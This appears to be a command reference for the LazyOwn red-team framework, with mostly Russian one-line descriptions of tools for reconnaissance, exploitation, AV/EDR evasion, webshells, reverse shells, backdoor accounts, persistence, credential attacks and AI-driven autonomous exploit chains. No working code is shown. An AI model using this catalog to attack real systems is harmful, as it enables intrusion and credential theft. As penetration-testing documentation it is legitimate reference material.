portdiscoverФаза: перечисление | Источник: cli/commands/scan.py
Сканирует все порты на указанном хосте для определения открытых портов.
portservicediscoverФаза: перечисление | Источник: cli/commands/scan.py
Сканирует все порты на указанном хосте для определения открытых портов и связанных с ними служб.
pre2kФаза: перечисление | Источник: cli/commands/scan_migrated.py
Выполняет инструмент pre2k для запроса self.params['domain'] на предмет учётных записей компьютеров до Windows 2000 или для передачи списка имен хостов для проверки аутентификации.
pykerbruteФаза: перечисление | Источник: cli/commands/scan_migrated.py
Команда pykerbrute: автоматизирует установку и выполнение PyKerbrute для перебора учётных записей Active Directory с использованием предварительной аутентификации Kerberos.
rdp_check_pyФаза: перечисление | Источник: cli/commands/scan_migrated.py
Выполняет инструмент проверки RDP для проверки учётных данных или аутентификации на основе хеша на целевой системе.
rpcclientФаза: перечисление | Источник: cli/commands/enum.py
Выполняет команду rpcclient для взаимодействия с удалённой системой Windows через RPC (удалённый вызов процедур) с использованием анонимных учётных данных.
rpcdumpФаза: перечисление | Источник: cli/commands/enum.py
Выполняет скрипт rpcdump.py для получения списка RPC-служб с целевого хоста.
rpcmap_pyФаза: перечисление | Источник: cli/commands/scan_migrated.py
Команда rpcmap_py: выполняет команды rpcmap.py для перечисления интерфейсов MSRPC.
samrdumpФаза: перечисление | Источник: cli/commands/scan_migrated.py
Запускает impacket-samrdump для выгрузки данных SAM с указанных портов.
sawksФаза: перечисление | Источник: cli/commands/scan_migrated.py
Выполняет инструмент Swaks (швейцарский армейский нож для SMTP) для отправки тестовых писем для имитации фишинга.
sessionsshФаза: перечисление | Источник: cli/commands/scan_migrated.py
Выполняет команду для вывода списка активных SSH-соединений.
skipfishPhase: enum | Source: cli/commands/scan.py
Эта функция выполняет инструмент веб-безопасности Skipfish.
smbattackPhase: enum | Source: cli/commands/scan_migrated.py
Сканирует хосты с открытым SMB-сервисом на порту 445 в указанной целевой сети.
smbclientPhase: enum | Source: cli/commands/enum.py
Взаимодействует с SMB-ресурсами с помощью команды smbclient для выполнения следующих операций:
smbclient_impacketPhase: enum | Source: cli/commands/enum.py
Взаимодействует с SMB-ресурсами с помощью команды smbclient для выполнения следующих операций:
smbclient_pyPhase: enum | Source: cli/commands/enum.py
Взаимодействует с SMB-ресурсами с помощью команды smbclient.py для выполнения следующих операций:
smbmapPhase: enum | Source: cli/commands/enum.py
smbmap -H 10.10.10.3 [OPTIONS]
smtpuserenumPhase: enum | Source: cli/commands/scan_migrated.py
Перечисляет пользователей SMTP с помощью инструмента smtp-user-enum методом VRFY.
snmpcheckPhase: enum | Source: cli/commands/scan_migrated.py
Выполняет проверку SNMP на указанном целевом хосте.
snmpwalkPhase: enum | Source: cli/commands/scan_migrated.py
Выполняет проверку SNMP на указанном целевом хосте.
swaksPhase: enum | Source: cli/commands/scan_migrated.py
Отправляет электронное письмо с помощью swaks (швейцарский армейский нож для SMTP).
vscanPhase: enum | Source: cli/commands/scan.py
Выполняет сканирование портов с помощью vscan с заданными параметрами.
wfuzzPhase: enum | Source: cli/commands/recon.py
Использует wfuzz для выполнения фаззинга на основе предоставленных параметров. Эта функция поддерживает различные опции для фаззинга каталогов и файлов.
windapsearchPhase: enum | Source: cli/commands/scan_migrated.py
Выполняет инструмент windapsearch для перечисления домена Active Directory через LDAP-запросы.
wpscanPhase: enum | Source: cli/commands/scan_migrated.py
Команда wpscan: устанавливает и запускает WPScan для сканирования уязвимостей WordPress.
aclpwn_pyPhase: exploit | Source: cli/commands/exploit_migrated.py
Выполняет инструмент aclpwn.py для поиска и эксплуатации путей ACL для повышения привилегий в среде Active Directory.
adcs_checkPhase: exploit | Source: cli/commands/exploit_migrated.py
Проверяет службы сертификации Active Directory на уязвимости ESC1-ESC8.
addspn_pyPhase: exploit | Source: cli/commands/exploit_migrated.py
Выполняет инструмент addspn.py для управления именами участников-служб (SPN) в учетных записях Active Directory через LDAP.
auto_pwnPhase: exploit | Source: cli/commands/pwn.py
Запускает полную автономную цепочку эксплуатации против цели.
autoblodyPhase: exploit | Source: cli/commands/exploit_migrated.py
Выполняет инструмент autobloody для автоматизации путей повышения привилегий в Active Directory.
cacti_exploitPhase: exploit | Source: cli/commands/exploit_migrated.py
Автоматизирует эксплуатацию уязвимости Cacti версии 1.2.26.
chainPhase: exploit | Source: cli/commands/exploit_migrated.py
Запускает автономную цепочку эксплуатации: разведка -> уязвимость -> эксплуатация -> пост-эксплуатация.
commixPhase: exploit | Source: cli/commands/exploit.py
Запускает commix для тестирования внедрения команд.
cpPhase: exploit | Source: cli/commands/exploit_migrated.py
Копирует файл из каталога ExploitDB в каталог sessions.
createcookiePhase: exploit | Source: cli/commands/exploit_migrated.py
Создает файл cookie.txt в каталоге sessions с указанным значением cookie.
createdllPhase: exploit | Source: cli/commands/exploit_migrated.py
Создает DLL-файл Windows с помощью MinGW-w64 или DLL Blazor для Linux.
digdugPhase: exploit | Source: cli/commands/exploit_migrated.py
Выполняет Dig Dug для увеличения размера исполняемого файла, используя предварительно настроенные параметры.
download_exploitPhase: exploit | Source: cli/commands/exploit.py
Загружает и настраивает эксплойт, опционально раздавая его через HTTP.
downloaderPhase: exploit | Source: cli/commands/exploit_migrated.py
Генерирует команду загрузчика для файлов в каталоге sessions.
eternalФаза: эксплойт | Источник: cli/commands/exploit_migrated.py
Автоматизирует процесс эксплуатации EternalBlue (MS17-010) с использованием Metasploit.
excelntdonutФаза: эксплойт | Источник: cli/commands/exploit_migrated.py
Генерирует макрос Excel 4.0 (XLM) из предоставленного исходного файла C# с помощью EXCELntDonut.
exploit_chainФаза: эксплойт | Источник: cli/commands/pwn.py
Многошаговая цепочка эксплойтов на основе ИИ с запасными стратегиями.
exploit_recommendФаза: эксплойт | Источник: cli/commands/exploit_migrated.py
Рекомендация эксплойтов на основе ИИ — сопоставляет обнаруженные сервисы с CVE.
filteringФаза: эксплойт | Источник: cli/commands/exploit_migrated.py
Применяет различные техники фильтрации к заданной командной строке, изменяя каждый символ или слово соответствующим образом.
gets4uticket_pyФаза: эксплойт | Источник: cli/commands/exploit_migrated.py
Выполняет инструмент gets4uticket.py из PKINITtools для запроса сервисного билета S4U2Self с использованием Kerberos.
gettgtpkinit_pyФаза: эксплойт | Источник: cli/commands/exploit_migrated.py
Выполняет инструмент gettgtpkinit.py из PKINITtools для запроса TGT с использованием Kerberos PKINIT с сертификатом PFX или PEM.
greatSCTФаза: эксплойт | Источник: cli/commands/exploit_migrated.py
Выполняет инструмент GreatSCT для генерации полезных нагрузок, обходящих антивирусные решения и списки разрешённых приложений.
img2cookieФаза: эксплойт | Источник: cli/commands/exploit.py
Генерирует XSS-полезную нагрузку, которая крадёт cookie через тег изображения.
jwt_toolФаза: эксплойт | Источник: cli/commands/exploit_migrated.py
Использует jwt_tool для анализа, изменения или эксплуатации JSON Web Tokens (JWT).
krbrelayx_pyФаза: эксплойт | Источник: cli/commands/exploit_migrated.py
Выполняет инструмент krbrelayx.py для ретрансляции Kerberos или злоупотребления неограниченной делегацией.
kusaФаза: эксплойт | Источник: cli/commands/exploit.py
Запускает генератор полезных нагрузок Kusanagi.
lazypwnФаза: эксплойт | Источник: cli/commands/exploit.py
Выполняет автоматизированный скрипт эксплуатации LazyPwn.
lfiФаза: эксплойт | Источник: cli/commands/exploit_migrated.py
Эксплуатирует потенциальную уязвимость локального включения файлов (LFI) путём создания
lolФаза: эксплойт | Источник: cli/commands/exploit_migrated.py
Эксплуатирует цель путём внедрения вредоносной полезной нагрузки и сбора информации об администраторе.
lolbas_useФаза: эксплойт | Источник: cli/commands/pwn.py
Выполнить конкретную технику LOLBAS.
ms08_067_netapiФаза: эксплойт | Источник: cli/commands/exploit_migrated.py
SMB CVE-2008-4250. Уязвимость с использованием модуля ms08_067_netapi из Metasploit.
ntpdateФаза: эксплойт | Источник: cli/commands/exploit_migrated.py
Синхронизирует системные часы с указанным NTP-сервером.
ownereditФаза: эксплойт | Источник: cli/commands/exploit_migrated.py
Выполняет инструмент owneredit из Impacket для управления владельцем объектов Active Directory.
padbusterФаза: эксплойт | Источник: cli/commands/exploit_migrated.py
Выполняет команду PadBuster для атак с использованием оракула набивки.
powerserverФаза: эксплойт | Источник: cli/commands/exploit_migrated.py
Эта функция генерирует PowerShell-скрипт, который получает обратную оболочку через HTTP в системе Windows.
printerbug_pyФаза: эксплойт | Источник: cli/commands/exploit_migrated.py
Выполняет инструмент printerbug.py для запуска ошибки SpoolService через RPC backconnect.
psexecФаза: эксплойт | Источник: cli/commands/enum.py
Выполняет инструмент PSExec из Impacket для попытки удалённого выполнения на указанной цели.
psexec_pyФаза: эксплойт | Источник: cli/commands/enum.py
Выполняет инструмент PSExec из Impacket для попытки удалённого выполнения на указанной цели.
py3ttyupФаза: эксплойт | Источник: cli/commands/exploit_migrated.py
Копирует команду обратной оболочки Python в буфер обмена.
pyautomateФаза: эксплойт | Источник: cli/commands/exploit_migrated.py
Автоматизирует выполнение инструментов pwntomate на XML-конфигурационных файлах.
pyoracle2Фаза: эксплойт | Источник: cli/commands/exploit_migrated.py
Выполняет инструмент pyOracle2 для проведения атак с использованием оракула набивки.
pywhiskerФаза: эксплойт | Источник: cli/commands/exploit_migrated.py
Выполняет инструмент pywhisker для проведения атак с использованием теневых учётных данных. Выполняет инструмент pyWhisker для управления атрибутом msDS-KeyCredentialLink целевого пользователя или компьютера.
rejetto_hfs_execФаза: эксплуатация | Источник: cli/commands/exploit_migrated.py
HttpFileServer версии 2.3. Уязвимость с использованием модуля rejetto_hfs_exec из metasploit.
revФаза: эксплуатация | Источник: cli/commands/exploit.py
Копирует однострочный reverse shell в буфер обмена.
seoФаза: эксплуатация | Источник: cli/commands/exploit_migrated.py
Выполняет веб-сканирование отпечатков пальцев SEO с помощью lazyseo.py.
sharpshooterФаза: эксплуатация | Источник: cli/commands/exploit_migrated.py
Выполняет фреймворк создания полезной нагрузки для получения и выполнения произвольного исходного кода C#.
shellfireФаза: эксплуатация | Источник: cli/commands/exploit_migrated.py
Запускает Shellfire с различными параметрами и позволяет генерировать полезные нагрузки.
shellshockФаза: эксплуатация | Источник: cli/commands/exploit_migrated.py
Выполняет атаку Shellshock против цели.
sirepratФаза: эксплуатация | Источник: cli/commands/exploit_migrated.py
Команда sireprat: автоматизирует настройку и использование SirepRAT для выполнения различных атак на устройство Windows IoT Core.
sqliФаза: эксплуатация | Источник: cli/commands/exploit_migrated.py
Запрашивает у пользователя URL, базу данных, таблицу и столбцы, а затем выполняет Python-скрипт.
sqli_mssql_testФаза: эксплуатация | Источник: cli/commands/exploit_migrated.py
Запускает обратную оболочку MSSQL, запуская HTTP-сервер для обработки входящих подключений и извлечения данных.
sqlmapФаза: эксплуатация | Источник: cli/commands/exploit.py
Запускает SQLMap против целевого URL для тестирования SQL-инъекций.
sqshФаза: эксплуатация | Источник: cli/commands/exploit_migrated.py
Выполняет инструмент Impacket sqsh для управления владением объектами Active Directory.
ssФаза: эксплуатация | Источник: cli/commands/recon.py
Ищет все источники эксплойтов и сопоставляет результаты со следующей командой LazyOwn.
sshexploitФаза: эксплуатация | Источник: cli/commands/exploit_migrated.py
Эксплуатирует уязвимость OpenSSH CVE-2023-38408 через функцию PKCS#11 в ssh-agent.
stealth_onФаза: эксплуатация | Источник: cli/commands/pwn.py
Включает скрытый режим для последующих операций.
template_helper_serializerФаза: эксплуатация | Источник: cli/commands/exploit_migrated.py
Обрабатывает создание и сериализацию вспомогательного шаблона.
ticketerФаза: эксплуатация | Источник: cli/commands/exploit.py
Запускает Impacket ticketer для создания золотых/серебряных билетов.
unicode_WAFbypassФаза: эксплуатация | Источник: cli/commands/exploit_migrated.py
Мы открываем прослушиватель Netcat на порту 443 и пытаемся эксплуатировать десериализацию NodeJS, отправляя
upload_bypassФаза: эксплуатация | Источник: cli/commands/exploit_migrated.py
Команда upload_bypass: автоматизирует установку и выполнение Upload_Bypass для проведения тестов обхода загрузки файлов.
utfФаза: эксплуатация | Источник: cli/commands/exploit_migrated.py
Кодирует заданную полезную нагрузку в escape-последовательности UTF-16.
winbase64payloadФаза: эксплуатация | Источник: cli/commands/exploit_migrated.py
Создает полезную нагрузку в кодировке base64 специально для Windows, чтобы выполнить команду PowerShell или скачать файл с использованием self.params['lhost'].
wrapperФаза: эксплуатация | Источник: cli/commands/exploit.py
Копирует полезные нагрузки LFI php-wrapper в буфер обмена.
wwwФаза: эксплуатация | Источник: cli/commands/exploit.py
Запускает простой HTTP-сервер на настроенном порту для обслуживания полезных нагрузок.
xssФаза: эксплуатация | Источник: cli/commands/exploit_migrated.py
Выполняет процедуру тестирования уязвимости XSS (межсайтовый скриптинг).
xsstrikeФаза: эксплуатация | Источник: cli/commands/exploit_migrated.py
Команда xsstrike: устанавливает и запускает XSStrike для поиска XSS-уязвимостей.
add2findФаза: пост-эксплуатация | Источник: cli/commands/postexp_migrated.py
Добавляет новую пользовательскую команду в систему 'find', сохраняя в user_commands.json.
adversaryФаза: пост-эксплуатация | Источник: cli/commands/postexp_migrated.py
Эмулятор противника LazyOwn RedTeam, вы можете настроить своих собственных противников в adversary.json.
adversary_yamlФаза: пост-эксплуатация | Источник: cli/commands/postexp_migrated.py
Выполнение действий противника из YAML-файлов в lazyadversaries/*.yaml
aes_peФаза: постэксплуатация | Источник: cli/commands/postexp_migrated.py
Шифрование с помощью AES и случайного ключа в PE EXE-файл для использования с загрузчиками.
apt_proxyФаза: постэксплуатация | Источник: cli/commands/postexp_migrated.py
Настраивает локальную машину с доступом в интернет для работы в качестве APT-прокси для машины без доступа в интернет.
apt_repoФаза: постэксплуатация | Источник: cli/commands/postexp_migrated.py
Создает комплексный локальный APT-репозиторий с улучшенным разрешением зависимостей.
atomic_lazyownФаза: постэксплуатация | Источник: cli/commands/postexp.py
Выполнение атомарных тестов red-team через LazyOwn.
bin2shellcodeФаза: постэксплуатация | Источник: cli/commands/postexp_migrated.py
Преобразует бинарный файл в строку shellcode в формате C или Nim.
convert_remcomsvc_from_fileФаза: постэксплуатация | Источник: cli/commands/postexp_migrated.py
Преобразует байтовую строку Python REMCOMSVC из remcomsvc.py в формат байтового среза Golang, выводит образец и сохраняет его в sessions/remcomsvc.go. См. lazyaddon GoPEInjection.
cportsФаза: постэксплуатация | Источник: cli/commands/postexp_migrated.py
Генерирует команду для отображения TCP и UDP портов и копирует её в буфер обмена.
create_syntheticФаза: постэксплуатация | Источник: cli/commands/postexp_migrated.py
Создает базовый синтетический playbook из Nmap CSV, когда LLM не срабатывает.
createpayloadФаза: постэксплуатация | Источник: cli/commands/postexp_migrated.py
Генерирует обфусцированный payload для обхода обнаружения AV с помощью инструмента payloadGenerator. Спасибо smokeme.
d3monizedshellФаза: постэксплуатация | Источник: cli/commands/postexp_migrated.py
Выполняет инструмент D3m0n1z3dShell для обеспечения постоянства в Linux.
disableavФаза: постэксплуатация | Источник: cli/commands/postexp.py
Создает VBS-скрипт для попытки отключения Windows Defender.
exe2binФаза: постэксплуатация | Источник: cli/commands/postexp_migrated.py
Преобразует файл .exe в бинарный файл.
exe2donutbinФаза: постэксплуатация | Источник: cli/commands/postexp_migrated.py
Преобразует файл .exe в donut-бинарный файл.
extract_yamlФаза: постэксплуатация | Источник: cli/commands/postexp_migrated.py
Извлекает YAML из существующего отладочного файла и пытается создать playbook.
findФаза: постэксплуатация | Источник: cli/commands/postexp_migrated.py
Автоматизирует выполнение команд на основе списка алиасов и команд.
follinaФаза: постэксплуатация | Источник: cli/commands/postexp.py
Запускает настройку эксплойта Follina (CVE-2022-30190).
hex2shellcodeФаза: постэксплуатация | Источник: cli/commands/postexp_migrated.py
Преобразует сырой hex-payload из msfvenom в совместимый с NASM формат shellcode.
internet_proxyФаза: постэксплуатация | Источник: cli/commands/postexp_migrated.py
Настраивает локальную машину с доступом в интернет для работы в качестве прокси для машины без доступа в интернет.
issue_command_to_c2Фаза: постэксплуатация | Источник: cli/commands/postexp_migrated.py
Выполняет команду на клиенте через C2. download: команда, вы должны поместить файл в sessions/temp_upload или использовать команду download_c2.
lazywebshellФаза: постэксплуатация | Источник: cli/commands/postexp.py
Запускает веб-шелл сервер LazyOwn на порту 8888.
mimikatzpyФаза: постэксплуатация | Источник: cli/commands/postexp.py
Запускает Mimikatz через Python (в стиле impacket).
ofuscate_payloadФаза: постэксплуатация | Источник: cli/commands/postexp_migrated.py
Обфусцирует shell-скрипт, кодируя его в Base64, и подготавливает команду для декодирования и выполнения.
ofuscate_stringФаза: постэксплуатация | Источник: cli/commands/postexp_migrated.py
Обфусцирует строку в код Go.
ofuscateshФаза: постэксплуатация | Источник: cli/commands/postexp_migrated.py
Обфусцирует shell-скрипт, кодируя его в Base64, и подготавливает команду для декодирования и выполнения.
ofuscatorps1Фаза: постэксплуатация | Источник: cli/commands/postexp.py
Обфусцирует PowerShell-скрипт.
path2hexФаза: постэксплуатация | Источник: cli/commands/postexp_migrated.py
Преобразует путь к бинарному файлу в hex-код little-endian x64 для внедрения shellcode.
pezorshФаза: постэксплуатация | Источник: cli/commands/postexp_migrated.py
Выполняет инструмент PEzor для упаковки исполняемых файлов или shellcode с пользовательскими конфигурациями.
pip_proxyPhase: postexp | Source: cli/commands/postexp_migrated.py
Настраивает локальную машину с доступом в интернет для работы в качестве pip-прокси для машины без доступа в интернет.
pip_repoPhase: postexp | Source: cli/commands/postexp_migrated.py
Настраивает локальный репозиторий pip для предоставления Python-пакетов для установки на скомпрометированной машине без доступа в интернет.
powershell_cmd_stagerPhase: postexp | Source: cli/commands/postexp_migrated.py
Генерирует и выполняет командный stager PowerShell для запуска скрипта .ps1.
rmfromfindPhase: postexp | Source: cli/commands/postexp_migrated.py
Удаляет пользовательскую команду по индексу (как показано в 'find').
rubeusPhase: postexp | Source: cli/commands/postexp_migrated.py
Копирует команду в буфер обмена для загрузки и запуска Rubeus.
scavengerPhase: postexp | Source: cli/commands/postexp.py
Запускает сборщик данных пост-эксплуатации Scavenger.
scpPhase: postexp | Source: cli/commands/postexp_migrated.py
Копирует локальный каталог "sessions" на удаленный хост с помощью scp, используя sshpass для автоматической аутентификации.
service_sshPhase: postexp | Source: cli/commands/postexp_migrated.py
Создает файл службы systemd для указанного бинарного файла и генерирует скрипт для включения и запуска службы.
sessionsshstracePhase: postexp | Source: cli/commands/postexp_migrated.py
Подключает strace к работающему процессу и записывает вывод в файл.
shellcodePhase: postexp | Source: cli/commands/postexp.py
Генерирует и управляет shellcode.
shellcode2elfPhase: postexp | Source: cli/commands/postexp_migrated.py
Преобразует shellcode в ELF-файл и заражает его.
shellcode2sylkPhase: postexp | Source: cli/commands/postexp_migrated.py
Преобразует shellcode в формат SYLK и сохраняет результат в файл.
shellcode_searchPhase: postexp | Source: cli/commands/postexp_migrated.py
Ищет shellcode в API shell-storm по предоставленным ключевым словам.
ssh_cmdPhase: postexp | Source: cli/commands/postexp_migrated.py
Выполняет удаленную команду через SSH с использованием настроенного start_user. См. help grisun0 для настройки пользователя-бэкдора.
yara_scanPhase: postexp | Source: cli/commands/postexp_migrated.py
Сканирует файлы или каталоги с помощью правил YARA на наличие вредоносных программ / IOC.
asprevbase64Phase: persist | Source: cli/commands/persist_migrated.py
Создает полезную нагрузку ASP reverse shell в кодировке base64 и копирует её в буфер обмена.
backdoor_factoryPhase: persist | Source: cli/commands/persist_migrated.py
Создает исполняемый файл с бэкдором с помощью backdoor-factory.
beaconcfgPhase: persist | Source: cli/commands/persist_migrated.py
Генерирует профиль C2 beacon с морфингом трафика и доменным фронтом.
conptyshellPhase: persist | Source: cli/commands/persist.py
Загружает ConPtyShell и подготавливает команду запуска PowerShell.
createrevshellPhase: persist | Source: cli/commands/persist.py
Создает bash-скрипт reverse shell в sessions/.
createwebshellPhase: persist | Source: cli/commands/persist.py
Создает веб-шеллы (PHP под видом JPG, p0wny-shell, ASP).
createwinrevshellPhase: persist | Source: cli/commands/persist.py
Создает Windows reverse shell (PowerShell).
darkarmourPhase: persist | Source: cli/commands/persist_migrated.py
Использует инструмент darkarmour для создания необнаруживаемой версии PE-исполняемого файла.
dr0p1tPhase: persist | Source: cli/commands/persist_migrated.py
Выполняет инструмент Dr0p1t для создания скрытого дроппера вредоносных программ.
ftpPhase: persist | Source: cli/commands/persist_migrated.py
Подключается к FTP-хосту, используя учетные данные из файла и указанный порт.
generate_revshellPhase: persist | Source: cli/commands/persist_migrated.py
Генерирует reverse shell на различных языках программирования.
grisun0Phase: persist | Source: cli/commands/persist_migrated.py
Создает и копирует команду shell для добавления нового пользователя, назначения пароля, добавления пользователя в группу sudo и переключения на этого пользователя.
grisun0wPhase: persist | Source: cli/commands/persist_migrated.py
Создает и копирует команду PowerShell для добавления нового пользователя, назначения пароля, добавления пользователя в группу администраторов и переключения на этого пользователя.
ivyФаза: постоянство | Источник: cli/commands/persist_migrated.py
Генерирует полезные нагрузки с помощью Ivy с различными опциями. Ivy — это фреймворк для создания полезных нагрузок для выполнения произвольного исходного кода VBA (макросов) непосредственно в памяти. Загрузчик Ivy делает это, используя программный доступ к объектной среде VBA для загрузки, расшифровки и выполнения шеллкода.
knokknokФаза: постоянство | Источник: cli/commands/persist_migrated.py
Отправляет специальную строку для запуска обратной оболочки с командой 'c2 client_name'.
listener_goФаза: постоянство | Источник: cli/commands/persist_migrated.py
Настраивает и запускает слушатель для указанной жертвы.
listener_pyФаза: постоянство | Источник: cli/commands/persist_migrated.py
Настраивает и запускает слушатель для указанной жертвы.
msfpcФаза: постоянство | Источник: cli/commands/persist_migrated.py
Генерирует полезные нагрузки с помощью MSFvenom Payload Creator (MSFPC).
paranoid_meterpreterФаза: постоянство | Источник: cli/commands/persist_migrated.py
Создает и развертывает параноидальную полезную нагрузку Meterpreter и слушатель с привязкой SSL/TLS и отслеживанием UUID.
pwncatФаза: постоянство | Источник: cli/commands/persist_migrated.py
Запускает pwncat с указанным портом для прослушивания. SELFINJECT
pwncatcsФаза: постоянство | Источник: cli/commands/persist.py
Запускает слушатель обратной оболочки pwncat-cs.
rdpФаза: постоянство | Источник: cli/commands/persist_migrated.py
Читает учетные данные из файла, шифрует пароль и выполняет команду подключения RDP.
revwinФаза: постоянство | Источник: cli/commands/persist.py
Создает исполняемый файл обратной оболочки Windows.
scarecrowФаза: постоянство | Источник: cli/commands/persist_migrated.py
Выполняет ScareCrow с различными опциями для обхода решений EDR и выполнения шеллкода.
serviceФаза: постоянство | Источник: cli/commands/persist_migrated.py
Создает файл службы systemd для указанного бинарного файла и генерирует скрипт для включения и запуска службы.
setoolKitsФаза: постоянство | Источник: cli/commands/persist_migrated.py
Выполняет рабочий процесс SEToolKit для генерации полезной нагрузки Meterpreter.
toctocФаза: постоянство | Источник: cli/commands/persist_migrated.py
Отправляет магический пакет китайскому вредоносному ПО.
veilФаза: постоянство | Источник: cli/commands/persist_migrated.py
Генерирует полезные нагрузки с помощью Veil-Evasion с различными опциями. Veil-Evasion — это фреймворк для создания полезных нагрузок.
weevelyФаза: постоянство | Источник: cli/commands/persist_migrated.py
Подключается к PHP-бэкдору с помощью Weevely, защищенному указанным паролем.
weevelygenФаза: постоянство | Источник: cli/commands/persist_migrated.py
Генерирует PHP-бэкдор с помощью Weevely, защищенный указанным паролем.
wmi_lateralФаза: постоянство | Источник: cli/commands/persist.py
Выполняет команду на удаленном хосте через WMI.
wmi_persistФаза: постоянство | Источник: cli/commands/persist.py
Создает постоянство с помощью подписки на события WMI (безфайловое, без записи на диск).
wmi_scheduled_taskФаза: постоянство | Источник: cli/commands/persist.py
Создает запланированную задачу для постоянства через WMI.
crystal_ballФаза: повышение привилегий | Источник: cli/commands/crystal_ball.py
Анализирует вывод linpeas/winpeas и ранжирует векторы повышения привилегий с точными командами.
gtfoФаза: повышение привилегий | Источник: cli/commands/privilege_escalation.py
Ищет бинарный файл в базах знаний GTFOBins и LOLBas parquet.
juicypotatoФаза: повышение привилегий | Источник: cli/commands/privilege_escalation.py
Раздает JuicyPotato через HTTP для повышения привилегий Windows.
lesФаза: повышение привилегий | Источник: cli/commands/privilege_escalation.py
Запускает Linux Exploit Suggester для версии ядра.
linpeasФаза: повышение привилегий | Источник: cli/commands/privilege_escalation.py
Раздает linpeas.sh через HTTP и выводит целевую однострочную команду.
printspooferФаза: повышение привилегий | Источник: cli/commands/privilege_escalation.py
Раздает PrintSpoofer через HTTP для повышения привилегий Windows.
privesc_cmd_by_osФаза: повышение привилегий | Источник: cli/commands/privilege_escalation.py
Подготовьте и отправьте команду linpeas/winpeas C2-клиенту.
privesc_suggestФаза: повышение привилегий | Источник: cli/commands/crystal_ball.py
Быстрый алиас для crystal_ball --auto.
pspyФаза: повышение привилегий | Источник: cli/commands/privilege_escalation.py
Раздайте процесс-монитор pspy через HTTP.
responderФаза: повышение привилегий | Источник: cli/commands/privilege_escalation.py
Запустите Responder на настроенном device с повышенными привилегиями.
smbserverФаза: повышение привилегий | Источник: cli/commands/privilege_escalation.py
Поднимите Impacket SMB-сервер с тремя вариантами ретрансляции.
sudoФаза: повышение привилегий | Источник: cli/commands/privilege_escalation.py
Перезапустите фреймворк с root-привилегиями, если они отсутствуют.
sudo_privescФаза: повышение привилегий | Источник: cli/commands/privilege_escalation.py
Проанализируйте вывод sudo -l и сверьте с GTFOBins.
suid_checkФаза: повышение привилегий | Источник: cli/commands/privilege_escalation.py
Выведите команды перечисления SUID/SGID, готовые для вставки на целевой системе.
whoami_privФаза: повышение привилегий | Источник: cli/commands/privilege_escalation.py
Выведите команды перечисления привилегий для целевой ОС.
winpeasФаза: повышение привилегий | Источник: cli/commands/privilege_escalation.py
Раздайте вариант winPEAS через HTTP и выведите однострочную команду для цели.
addusersФаза: учетные данные | Источник: cli/commands/cred_migrated.py
Открывает или создает файл users.txt в каталоге sessions для редактирования с помощью nano.
adsso_sprayФаза: учетные данные | Источник: cli/commands/cred_migrated.py
Выполняет атаку перебором паролей (password spray) на Azure Active Directory Seamless Single Sign-On (SSO), используя указанный список пользователей.
cewlФаза: учетные данные | Источник: cli/commands/cred.py
Сгенерируйте словарь из веб-сайта с помощью cewl.
crack_cisco_7_passwordФаза: учетные данные | Источник: cli/commands/cred_migrated.py
Взломайте хэш пароля Cisco Type 7 и отобразите открытый текст.
createcredentialsФаза: учетные данные | Источник: cli/commands/cred_migrated.py
Создает файл credentials.txt в каталоге sessions с указанными именем пользователя и паролем.
createhashФаза: учетные данные | Источник: cli/commands/cred_migrated.py
Создает файл hash.txt в каталоге sessions с указанным значением хэша и анализирует его с помощью Name-the-hash.
createmailФаза: учетные данные | Источник: cli/commands/cred_migrated.py
Сгенерируйте перестановки email на основе полного имени и self.params['domain'], затем сохраните их в файл.
createusers_and_hashsФаза: учетные данные | Источник: cli/commands/cred_migrated.py
Команда createusers_and_hashs: извлекает имена пользователей и хэши из файла дампа.
credФаза: учетные данные | Источник: cli/commands/cred_migrated.py
Отобразите учетные данные, хранящиеся в файле credentials.txt, и скопируйте пароль в буфер обмена.
creds_pyФаза: учетные данные | Источник: cli/commands/cred.py
Извлеките учетные данные из файла или вывода команды.
crunchФаза: учетные данные | Источник: cli/commands/cred.py
Сгенерируйте словари с помощью crunch.
cubesprayingФаза: учетные данные | Источник: cli/commands/cred_migrated.py
Команда cubespraying: автоматизирует установку и использование CubeSpraying для выполнения атак распыления учетных данных.
dacleditФаза: учетные данные | Источник: cli/commands/cred_migrated.py
Выполните команду dacledit.py для конкретного пользователя или всех пользователей, перечисленных в файле users.txt.
generatedicФаза: учетные данные | Источник: cli/commands/cred_migrated.py
Генерирует словарь на основе целевого имени и списка символов с различными комбинациями.
hashcatФаза: учетные данные | Источник: cli/commands/cred.py
Запустите взлом паролей с помощью hashcat.
hydraФаза: учетные данные | Источник: cli/commands/cred.py
Запустите Hydra для онлайн-атак на пароли.
john2hashФаза: учетные данные | Источник: cli/commands/cred.py
Преобразуйте хэш в формат John the Ripper.
john2keepasФаза: учетные данные | Источник: cli/commands/cred_migrated.py
Перечислите все файлы .kdbx в каталоге 'sessions', дайте пользователю выбрать один и запустите
john2zipФаза: учетные данные | Источник: cli/commands/cred_migrated.py
Перечислите все файлы .zip в каталоге 'sessions', дайте пользователю выбрать один и запустите команду
keepassPhase: учетные данные | Source: cli/commands/cred_migrated.py
Открывает файл .kdbx и выводит заголовки и содержимое всех записей. Пароль можно указать через
medusaPhase: учетные данные | Source: cli/commands/cred.py
Запуск Medusa для онлайн-атак на пароли.
passtightvncPhase: учетные данные | Source: cli/commands/cred_migrated.py
Расшифровывает пароли TightVNC с помощью Metasploit.
passwordsprayPhase: учетные данные | Source: cli/commands/cred_migrated.py
Выполняет распыление паролей с помощью crackmapexec с указанными параметрами.
refill_passwordPhase: учетные данные | Source: cli/commands/cred_migrated.py
Генерирует список возможных паролей, заменяя каждую звёздочку во входных данных на указанные пользователем символы.
rockyPhase: учетные данные | Source: cli/commands/cred_migrated.py
Сокращает словарь на основе заданной длины пароля.
searchhashPhase: учетные данные | Source: cli/commands/cred_migrated.py
Помогает найти типы хэшей в Hashcat, просматривая его справочный вывод.
smalldicPhase: учетные данные | Source: cli/commands/cred_migrated.py
Обрабатывает создание временных файлов для пользователей и паролей на основе небольшого словаря.
spraykatzPhase: учетные данные | Source: cli/commands/cred.py
Запуск SprayKatz для распыления учётных данных.
sshkeyPhase: учетные данные | Source: cli/commands/cred.py
Генерирует пару SSH-ключей.
transformPhase: учетные данные | Source: cli/commands/cred_migrated.py
Преобразует входную строку в соответствии с заданным пользователем стилем регистра.
username_anarchyPhase: учетные данные | Source: cli/commands/cred_migrated.py
Генерирует имена пользователей с помощью инструмента username-anarchy на основе пользовательского ввода.
addcliPhase: латеральное перемещение | Source: cli/commands/lateral_migrated.py
Добавляет клиента для выполнения команд C2.
bitmPhase: латеральное перемещение | Source: cli/commands/bitm.py
Менеджер атак "браузер посередине" (Browser-in-the-Middle).
